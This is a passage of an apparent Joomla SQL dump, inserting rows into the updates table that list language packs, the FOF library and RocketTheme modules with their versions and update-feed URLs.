LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1819,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1820,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1821,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1822,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1824,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1825,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1826,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1827,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1828,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1829,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1830,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1831,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1832,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1833,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1834,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1835,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1836,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1837,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1838,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1839,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1840,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1841,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1842,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1843,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1844,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1845,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1846,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1847,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1848,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1849,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1850,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1851,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1852,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1853,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1854,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1855,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1856,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1857,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(1858,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1859,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1860,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1861,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1862,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1863,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1864,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1865,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1866,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1867,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1868,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1869,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1870,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1871,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1872,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1873,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1874,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1875,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1876,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1877,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1878,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1879,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1880,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1881,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1882,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1883,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1884,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1885,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1886,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1887,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1888,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1889,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1890,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1891,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1892,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1893,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1894,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1895,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1896,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1897,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1898,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1899,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1900,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1901,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1902,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(1903,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1904,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1905,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1906,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1907,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1908,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1909,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1910,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1911,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1912,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1913,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1914,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1915,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1916,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1917,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1918,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1919,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1920,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1921,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1922,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1923,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1924,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1925,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1926,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1927,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1928,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1929,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1930,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(1931,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1932,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1933,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1934,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1935,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1936,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1937,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1938,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1939,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1940,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1941,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1942,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1943,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1944,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1945,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1946,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(1947,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1948,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1949,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1950,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1951,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1952,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1953,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1954,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1955,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1956,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1957,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1958,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1959,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1960,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1961,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1962,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1963,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1964,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1965,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1966,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1967,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1968,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1969,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1970,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1971,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1972,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1973,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1974,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1975,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1976,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(1977,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1978,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1979,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1980,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1981,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1982,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1983,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1984,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1985,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1986,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1987,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1988,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1989,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1990,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1991,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1992,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(1993,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1994,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1995,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1996,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1997,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1998,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1999,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2000,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2001,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(2002,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2003,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2004,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2005,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2006,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2007,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2008,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2009,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2010,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2011,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2012,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2013,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2014,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2015,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2016,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2017,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2018,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2019,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2020,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2021,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2022,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2023,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2024,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2025,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2026,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2027,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2028,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2029,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2030,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2031,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2032,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2033,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2034,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2035,3,0,'English 